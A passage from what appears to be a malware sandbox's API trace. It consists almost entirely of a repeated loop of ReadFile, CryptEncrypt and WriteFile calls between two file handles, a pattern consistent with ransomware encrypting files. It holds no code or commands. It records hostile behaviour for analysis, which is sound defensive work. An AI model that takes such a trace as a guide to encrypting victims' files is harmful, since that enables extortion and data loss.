lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.939] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.939] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.940] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.940] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.940] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.940] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.941] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.941] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.941] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.941] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.941] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.941] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.941] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.942] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.942] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.942] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.942] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.942] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.942] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.943] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.943] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.943] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.943] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.943] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.944] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.944] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.944] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.944] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.944] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.944] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.945] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.945] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, 